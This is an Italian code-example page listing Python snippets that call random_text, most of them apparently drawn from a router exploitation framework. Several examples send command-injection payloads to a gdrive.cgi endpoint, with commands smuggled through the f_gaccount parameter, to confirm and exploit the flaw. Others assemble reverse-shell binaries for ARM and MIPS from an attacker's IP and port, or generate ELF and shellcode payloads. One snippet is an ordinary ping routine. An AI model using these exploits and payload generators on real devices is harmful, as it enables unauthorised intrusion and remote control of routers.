Esempio n. 1
0
 def check(self, host, port, timeout):
     cmd = utils.random_text(6)
     resp = self.execute(host, port, timeout, cmd)
     if cmd in resp:
         self.print_check_result(True, host)
         return True
     else:
         self.print_check_result(False, host)
         return False
Esempio n. 2
0
 def check(self, host, port, timeout):
     cmd = 'echo {}'.format(utils.random_text(10))
     response = self.execute(host, port, timeout, cmd)
     self.s.close()
     if response in cmd:
         self.print_check_result(True, host)
         return True  # target is vulnerable
     self.print_check_result(False, host)
     return False
Esempio n. 3
0
    def run(self):
        """Pings a remote host and handles the responses."""

        payload_provider = provider.Repeat(b'', 0)

        if self.sweep_start and self.sweep_end and self.sweep_end >= self.sweep_start:
            if not self.payload:
                self.payload = random_text(self.sweep_start)
            payload_provider = provider.Sweep(self.payload, self.sweep_start,
                                              self.sweep_end)
        elif self.size and self.size > 0:
            if not self.payload:
                self.payload = random_text(self.size)
            payload_provider = provider.Repeat(self.payload, self.count)

        # Set the Don't Fragment bit.
        if self.dont_fragment:
            self.options = network.SocketInterface.dont_fragment

        while True:
            seed_id = randint(0x1, 0xFFFF)
            if seed_id not in self.seed_identifiers.ids:
                self.seed_identifiers.ids.append(seed_id)
                break

        communicator = executor.Communicator(self.destination,
                                             payload_provider,
                                             self.timeout,
                                             socket_options=self.options,
                                             verbose=self.verbose,
                                             output=self.output,
                                             seed_id=seed_id)

        communicator.run(match_payloads=self.match)

        self.seed_identifiers.ids.remove(seed_id)

        return communicator.responses
Esempio n. 4
0
    def execute(self, host, port, timeout, cmd):
        mark = utils.random_text(32)
        url = "{}:{}/cgi-bin/gdrive.cgi?cmd=4&f_gaccount=;{};echo {};".format(
            host, port, cmd, mark)

        response, err = self.http_get(self.s, url, timeout)
        if err:
            self.print_requests_err(host, err)
            return ''

        if mark in response.text:
            regexp = "(|.+?){}".format(mark)
            res = re.findall(regexp, response.text, re.DOTALL)

            if len(res):
                return res[0]

        return ""
Esempio n. 5
0
    def generate_binary(self, lhost, lport):
        print_warning("Generating reverse shell binary")
        self.binary_name = random_text(8)
        ip = self.convert_ip(lhost)
        port = self.convert_port(lport)

        if self.arch == 'arm':
            self.revshell = self.arm[:0x104] + ip + self.arm[
                0x108:0x10a] + port + self.arm[0x10c:]
        elif self.arch == 'mipsel':
            self.revshell = self.mipsel[:0xe4] + port + self.mipsel[
                0xe6:0xf0] + ip[2:] + self.mipsel[
                    0xf2:0xf4] + ip[:2] + self.mipsel[0xf6:]
        elif self.arch == 'mips':
            self.revshell = self.mips[:0xea] + port + self.mips[
                0xec:0xf2] + ip[:2] + self.mips[0xf4:0xf6] + ip[
                    2:] + self.mips[0xf8:]
        else:
            print_failed("Platform not supported")
Esempio n. 6
0
    def check(self, host, port, timeout):
        number = int(utils.random_text(6, alph=string.digits))
        solution = number - 1

        cmd = "echo $(({}-1))".format(number)
        url = "http://{}:{}/cgi-bin/gdrive.cgi?cmd=4&f_gaccount=;{};echo ffffffffffffffff;".format(
            host, port, cmd)

        response, err = self.http_get(self.s, url, timeout)
        if err:
            self.print_requests_err(host, port, e)
            self.print_check_result(False, host)
            return False

        if response.status_code == 200 and str(solution) in response.text:
            self.print_check_result(True, host)
            return True  # target is vulnerable

        self.print_check_result(False, host)
        return False
Esempio n. 7
0
class ArchitectureSpecificPayload(BasePayload):
    architecture = None

    output = exploits.Option('python', 'Output type: elf/c/python')
    filepath = exploits.Option("/tmp/{}".format(random_text(8)),
                               'Output file to write')

    def __init__(self):
        super(ArchitectureSpecificPayload, self).__init__()
        if self.architecture not in Architectures:
            raise OptionValidationError(
                "Please use one of valid payload architectures: {}".format(
                    Architectures._fields))

        self.header = ARCH_ELF_HEADERS[self.architecture]
        self.bigendian = True if self.architecture.endswith("be") else False

    def run(self):
        print_status("Generating payload")
        try:
            data = self.generate()
        except OptionValidationError as e:
            print_error(e)
            return

        if self.output == "elf":
            with open(self.filepath, 'w+') as f:
                print_status("Building ELF payload")
                content = self.generate_elf(data)
                print_success("Saving file {}".format(self.filepath))
                f.write(content)
        elif self.output == "c":
            print_success("Bulding payload for C")
            content = self.generate_c(data)
            print_info(content)
        elif self.output == "python":
            print_success("Building payload for python")
            content = self.generate_python(data)
            print_info(content)
        else:
            raise OptionValidationError("No such option as {}".format(
                self.output))

    def generate_elf(self, data):
        elf = self.header + data

        if self.bigendian:
            p_filesz = pack(">L", len(elf))
            p_memsz = pack(">L", len(elf) + len(data))
        else:
            p_filesz = pack("<L", len(elf))
            p_memsz = pack("<L", len(elf) + len(data))

        content = elf[:0x44] + p_filesz + p_memsz + elf[0x4c:]
        return content

    @staticmethod
    def generate_c(data):
        res = "unsigned char sh[] = {\n    \""
        for idx, x in enumerate(data):
            if idx % 15 == 0 and idx != 0:
                res += "\"\n    \""
            res += "\\x%02x" % ord(x)
        res += "\"\n};"
        return res

    @staticmethod
    def generate_python(data):
        res = "payload = (\n    \""
        for idx, x in enumerate(data):
            if idx % 15 == 0 and idx != 0:
                res += "\"\n    \""
            res += "\\x%02x" % ord(x)
        res += "\"\n)"
        return res
Esempio n. 8
0
class Payload(exploits.Exploit):
    output = exploits.Option('python', 'Output type: elf/python')
    filepath = exploits.Option("/tmp/{}".format(random_text(8)),
                               'Output file to write')

    def __init__(self):
        if self.architecture == "armle":
            self.bigendian = False
            self.header = ARCH_ELF_HEADERS['armle']
        elif self.architecture == "mipsbe":
            self.bigendian = True
            self.header = ARCH_ELF_HEADERS['mipsbe']
        elif self.architecture == "mipsle":
            self.bigendian = False
            self.header = ARCH_ELF_HEADERS['mipsle']
        else:
            print_error(
                "Define architecture. Supported architectures: armle, mipsbe, mipsle"
            )
            return None

    def run(self):
        print_status("Generating payload")
        self.generate()

        if self.output == "elf":
            with open(self.filepath, 'w+') as f:
                print_status("Building ELF payload")
                content = self.generate_elf()

                print_success("Saving file {}".format(self.filepath))
                f.write(content)

        elif self.output == "python":
            print_success("Building payload for python")
            content = self.generate_python()
            print_info(content)

    def convert_ip(self, addr):
        res = ""
        for i in addr.split("."):
            res += chr(int(i))
        return res

    def convert_port(self, p):
        res = "%.4x" % int(p)
        return res.decode('hex')

    def generate_elf(self):
        elf = self.header + self.payload

        if self.bigendian:
            p_filesz = pack(">L", len(elf))
            p_memsz = pack(">L", len(elf) + len(self.payload))
        else:
            p_filesz = pack("<L", len(elf))
            p_memsz = pack("<L", len(elf) + len(self.payload))

        content = elf[:0x44] + p_filesz + p_memsz + elf[0x4c:]
        return content

    def generate_python(self):
        res = "payload = (\n    \""
        for idx, x in enumerate(self.payload):
            if idx % 15 == 0 and idx != 0:
                res += "\"\n    \""

            res += "\\x%02x" % ord(x)
        res += "\"\n)"
        return res